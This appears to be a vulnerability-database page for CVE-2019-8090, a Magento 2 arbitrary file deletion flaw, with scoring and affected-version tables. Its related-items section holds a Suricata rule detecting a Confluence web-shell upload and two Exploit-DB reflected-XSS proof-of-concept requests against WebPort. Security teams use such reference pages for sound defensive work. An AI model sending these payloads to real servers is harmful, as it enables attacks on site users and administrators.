CVE-2019-8090
published 2019-11-05CVE-2019-8090: An arbitrary file deletion vulnerability exists in Magento 2.1 prior to 2.1.19, Magento 2.2 prior to 2.2.10, Magento 2.3 prior to 2.3.3. An authenticated users…
PriorityP336medium6.5CVSS 3.1
AVNACLPRLUINSUCNIHAN
EPSS
0.79%
51.8th percentile
An arbitrary file deletion vulnerability exists in Magento 2.1 prior to 2.1.19, Magento 2.2 prior to 2.2.10, Magento 2.3 prior to 2.3.3. An authenticated users can manipulate the design layout update feature.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adobe_systems_incorporated | magento_2 | — | — |
| magento | community-edition | >= 2.2.0 < 2.2.10 | 2.2.10 |
| magento | community-edition | >= 2.3.0 < 2.3.3 | 2.3.3 |
| magento | magento | — | — |
| magento | magento | >= 2.1.0 < 2.1.19 | 2.1.19 |
| magento | magento | >= 2.2.0 < 2.2.10 | 2.2.10 |
| magento | magento | >= 2.3.0 < 2.3.2 | 2.3.2 |
CVSS provenance
nvdv3.16.5MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
nvdv2.05.5MEDIUMAV:N/AC:L/Au:S/C:N/I:P/A:P
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Magento 2 Community Edition Arbitrary File Deletion
ghsa·2022-05-24
CVE-2019-8090 [MEDIUM] Magento 2 Community Edition Arbitrary File Deletion
Magento 2 Community Edition Arbitrary File Deletion
An arbitrary file deletion vulnerability exists in Magento 2.1 prior to 2.1.19, Magento 2.2 prior to 2.2.10, Magento 2.3 prior to 2.3.3. An authenticated users can manipulate the design layout update feature.
OSV
Magento 2 Community Edition Arbitrary File Deletion
osv·2022-05-24
CVE-2019-8090 [MEDIUM] Magento 2 Community Edition Arbitrary File Deletion
Magento 2 Community Edition Arbitrary File Deletion
An arbitrary file deletion vulnerability exists in Magento 2.1 prior to 2.1.19, Magento 2.2 prior to 2.2.10, Magento 2.3 prior to 2.3.3. An authenticated users can manipulate the design layout update feature.
Suricata
ET EXPLOIT Confluence Server Path Traversal Vulnerability (CVE-2019-3398)
suricata·2021-10-27·CVSS 8.8
CVE-2019-3398 [HIGH] ET EXPLOIT Confluence Server Path Traversal Vulnerability (CVE-2019-3398)
ET EXPLOIT Confluence Server Path Traversal Vulnerability (CVE-2019-3398)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] 8090 (msg:"ET EXPLOIT Confluence Server Path Traversal Vulnerability (CVE-2019-3398)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"plugins/drag-and-drop/upload.action"; nocase; fast_pattern; content:"draftId="; nocase; distance:0; content:"filename="; nocase; content:"/shell.jsp"; nocase; content:"atl_token"; nocase; http.request_body; content:"<%"; reference:url,github.com/superevr/cve-2019-3398/blob/master/poc.py; reference:cve,2019-3398; classtype:attempted-admin; sid:2034261; rev:1; metadata:created_at 2021_10_27, cve CVE_2019_3398, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CISA_K
Exploit-DB
WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
exploitdb·2020-06-22·CVSS 6.1
CVE-2019-12460 [MEDIUM] WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
---
# Exploit Title: WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
# Date: 2019-05-30
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://webport.se/
# Software Link: https://webport.se/nedladdningar/
# Version: v1.19.1
# Tested on: Windows/Linux
# CVE-2019-12460
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12460
# https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
# PoC
To exploit vulnerability, someone could use 'http://
[server]:8090/access/setup?type="alert('xss');'
request
to impact users who open a maliciously crafted link or third-party web page.
GET /access/setup?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E
HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (M
Exploit-DB
WebPort 1.19.1 - Reflected Cross-Site Scripting
exploitdb·2020-06-22·CVSS 6.1
CVE-2019-12461 [MEDIUM] WebPort 1.19.1 - Reflected Cross-Site Scripting
WebPort 1.19.1 - Reflected Cross-Site Scripting
---
# Exploit Title: WebPort 1.19.1 - Reflected Cross-Site Scripting
# Date: 2019-05-30
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://webport.se/
# Software Link: https://webport.se/nedladdningar/
# Version: v1.19.1
# Tested on: Windows/Linux
# CVE-2019-12461
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12461
# https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
# PoC
To exploit vulnerability, someone could use 'http://
[server]:8090/log?type="alert('xss');'
request
to impact users who open a maliciously crafted link or third-party web page.
GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E
HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv
No writeups or analysis indexed.
2019-11-05
Published